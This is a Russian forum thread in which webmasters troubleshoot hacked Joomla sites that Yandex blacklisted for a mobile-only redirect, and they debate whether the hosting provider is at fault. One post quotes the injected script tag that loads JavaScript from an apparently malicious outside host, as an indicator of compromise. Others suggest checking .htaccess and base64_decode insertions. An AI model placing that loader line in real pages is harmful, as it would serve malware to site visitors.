draff

draff
Рейтинг
65
Регистрация
30.03.2010
Должность
freelance
Интересы
web
vtomas:

Не пойму кто шлет эти письма?

Работа плагина Marco's- System - Marco's SQL Injection - LFI Interceptor

ksn3672:
но один из сервисов проверки утверждает, что остался мобильный редикт с посторонним кодом. И активность на сайте странная, куча новых регистраций, так было, если 1 человек зарегится, то и все, а сейчас по 20 в день. Может, это проявление продолжающейся хакерской атаки?

Не продолжение,а последствия изменений в работе скриптов,после атаки хакера.

Проверяйте отключение регистрации на сайте и без подтверждения админом.

Ищите редирект в .htaccess и вставки кода base64_decode в скриптах .php

dyakoff:
Что вы имеете ввиду под дырявым хостингом? .

Инфа в свободном доступе.

как например было у таймвеб

Так timeweb хоть признал свою ошибку.

hakuna matata:
а причем там curl_exec?
разве код не внедряется модулем веб-сервера на лету?

Я хочу определить кто виновник,скрипты Джумла,которые используют Curl или дырявый хостинг.

3s777

curl_exec — Выполняет запрос cURL

Хотя сайты разные, второй сайт на последней joomla 2.5, общих уязвимостей нет.

А хостер клиента,не руг.ру, съезжает на старую Джумла 1.5.А скрипт пишется и Джумла 2.5.

Не хотят работать.

Вопрос к знающим- а поможет отключение curl_exec,на запрет соединения с чужим сервером для загрузки "левого" яваскрипт ?

Front2000:
Вчера было тоже самое с двумя сайтами на timeweb
Яндекс заблокировал за вредоносный код. Я все перерыл - ну нет кода и все. Все файлы нетронутые. Гугл молчит. Прогнал через virustotal - только 1 Яндекс недоволен, все остальные рады.
Нажал в Яндексе кнопку ПЕРЕПРОВЕРИТЬ - через 5 минут все страницы стали открываться нормально, а сегодня и значки о заражении из Я.Вебмастера убрались.
Вопрос - это таймвэб мутит?

Эт повезло что хостер быстро отреагировал.Вчера 13:44 Chained

Хостер моего клиента молчит,и два сайта в черном списке.

У клиента на другом хостинге аналогичная проблема.Яндекс внес в черный список из-за мобильного редиректа.При заходе с под iPhoneMobile Safari,

появляется в head яваскрипт <script type="text/javascript" src="http://html.sdnsistems.net/ldr.php?912015284"></script>. Один раз для одного IP.

Вчера клиент обращалась к хостеру,тот в отказ.

Файлы сайтов на движке Джумла,проверены на все известные редиректы, вирусы,шелл.

Я так понимаю взлом на уровне ОС,и уязвимость свежая за июнь 2013.

ну и мой уже работает.

Angelys:
да .. молодчаги =) чуяли наверно ...

и у меня на сейчас сайт недоступен.запиарилися кирхост.и предьявить нечего-в договоре не забыли указать о снятии ответственности в случае поломки на линиях и оборудовании не принадлежащим кирхосту.

Всего: 139